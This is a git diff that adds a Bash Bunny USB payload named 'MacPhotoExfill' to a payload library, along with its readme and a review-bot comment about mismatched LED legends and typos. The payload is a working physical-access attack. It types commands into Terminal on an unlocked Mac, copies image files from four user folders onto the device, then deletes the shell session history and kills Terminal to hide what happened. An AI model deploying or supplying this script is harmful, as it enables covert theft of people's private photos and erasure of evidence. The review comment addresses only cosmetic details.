diff --git a/payloads/library/exfiltration/MacPhotoExfill/payload.txt b/payloads/library/exfiltration/MacPhotoExfill/payload.txt
new file mode 100644
index 000000000..e2ed4f90b
--- /dev/null
+++ b/payloads/library/exfiltration/MacPhotoExfill/payload.txt
@@ -0,0 +1,69 @@
+#!/bin/bash
+#
+# Title: MacPhotoExfill
+# Author: afsh4ck
+# Version: 1.0
+# Target: MacOS
+# Category: Exfiltration
+#
+# Exfilter all the images from the principal folders on unlocked MacOS targets.
+# Stashes them in /loot/MacPhotoExfill
+#
+# Purple Setup
+# Amber..............Attack Mode ON
+# Green..............Finished
+
+LED SETUP
+ATTACKMODE HID STORAGE ECM_ETHERNET
+GET TARGET_HOSTNAME
+QUACK DELAY 1000
+
+lootdir=loot/MacPhotoExfill/$TARGET_HOSTNAME
+mkdir -p /root/udisk/$lootdir
+
+QUACK GUI SPACE
+QUACK DELAY 1000
+QUACK STRING terminal
+QUACK ENTER
+QUACK DELAY 2000
+
+LED ATTACK
+
+QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Documents;
+QUACK ENTER
+QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Desktop;
+QUACK ENTER
+QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Pictures;
+QUACK ENTER
+QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Downloads;
+QUACK ENTER
+QUACK STRING cp Documents/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Documents ;
+QUACK ENTER
+QUACK STRING cp Desktop/*.{png,jpg,jpeg} /Volumes/BashBunny/$lootdir/Desktop ;
+QUACK ENTER
+QUACK STRING cp Pictures/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Pictures ;
+QUACK ENTER
+QUACK STRING cp Downloads/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Downloads ;
+QUACK ENTER
+# We can control the time for the payload execution
+QUACK DELAY 25000
+QUACK CTRL C
+# Cleanup and delete proofs
+LED M SLOW
+QUACK ENTER
+QUACK ENTER
+# Eject BB storage
+QUACK STRING diskutil eject /Volumes/BashBunny/
+QUACK ENTER
+QUACK DELAY 500
+# Remove terminal history from current session (commands used in attack won't be visible with the history command)
+QUACK STRING rm -r ~/.zsh_sessions
+QUACK ENTER
+QUACK DELAY 500
+# Exit terminal
+QUACK STRING killall Terminal
+QUACK ENTER
+# Ensure sincronization
+sync
+
+LED FINISH
\ No newline at end of file
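Review bot: The LED legend in the header comment (`# Purple Setup`, `# Amber..............Attack Mode ON`, `# Green..............Finished`) does not match the phases the body actually signals — `LED SETUP`, `LED ATTACK`, then `LED M SLOW` for the cleanup section and `LED FINISH` — and the readme added in the same commit gives a third mapping (Green for setup, Purple Slow for cleaning, Green Fixed for finish). The header should list the same four phases as the code, using the readme's colours, with an added line for the `LED M SLOW` cleanup phase (presumably `M` is magenta on this hardware; confirm against the framework's LED colour table). The `# Stashes them in /loot/MacPhotoExfill` line is also stale, since `lootdir` appends `$TARGET_HOSTNAME` and the readme already documents the per-host subfolder; `# Stashes them in /loot/MacPhotoExfill/<hostname>` would match. Finally, `# Ensure sincronization` should read `# Ensure synchronization`.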
diff --git a/payloads/library/exfiltration/MacPhotoExfill/readme.md b/payloads/library/exfiltration/MacPhotoExfill/readme.md
new file mode 100644
index 000000000..9e9e1bb76
--- /dev/null
+++ b/payloads/library/exfiltration/MacPhotoExfill/readme.md
@@ -0,0 +1,50 @@
+# Mac Photo Exfilter for the BashBunny
+
+
+* ___ ___ ___ ___ ___ ___ ___
+* / /\ / /\ / /\ /__/\ / /\ / /\ /__/|
+* / /::\ / /:/_ / /:/_ \ \:\ / /::\ / /:/ | |:|
+* / /:/\:\ / /:/ /\ / /:/ /\ \__\:\ / /:/\:\ / /:/ | |:|
+* / /:/ /::\ / /:/ /:// /:/ /::\ ___ / /::\ / /:/ /::\ / /:/ ___ __| |:|
+* /__/:/ /:/\:\/__/:/ /://__/:/ /:/\:\/__/\ /:/\:\/__/:/ /:/\:\/__/:/ / /\/__/\_|:|____
+* \ \:\/:/__\/\ \:\/:/ \ \:\/:/ /:/\ \:\/:/__\/\ \:\/:/__\/\ \:\ / /:/\ \:\/:::::/
+* \ \::/ \ \::/ \ \::/ /:/ \ \::/ \ \::/ \ \:\ /:/ \ \::/---
+* \ \:\ \ \:\ \__\/ /:/ \ \:\ \ \:\ \ \:\/:/ \ \:\
+* \ \:\ \ \:\ /__/:/ \ \:\ \ \:\ \ \::/ \ \:\
+* \__\/ \__\/ \__\/ \__\/ \__\/ \__\/ \__\/
+
+
+* Author: afsh4ck
+* Version: 1.0
+* Target: MacOS
+* Tested on: Ventura 13.3.1
+* Category: Exfiltration
+
+# DESCRIPTION
+
+Exfilter all the images from the principal folders on unlocked MacOS targets.
+Stashes them in /loot/MacPhotoExfill/$hostname grouped in subfolders:
+
+| Subfolder | Content |
+| ------------------ | -------------------------------------------- |
+| Documents | All the images in /root/Documents folder |
+| Desktop | All the images in /root/Desktop folder |
+| Pictures | All the images in /root/Pictures folder |
+| Downloads | All the images in /root/Downloads folder |
+
+# IMAGE FORMATS
+
+| Format |
+| ------------------ |
+| .jpg |
+| .jpeg |
+| .png |
+
+# LED STATUS
+
+| LED | Status |
+| ------------------ | -------------------------------------------- |
+| Green | Setup |
+| Yellow Blink | Attack Mode ON |
+| Purple Slow | Cleaning all proofs |
+| Green Fixed | Finish |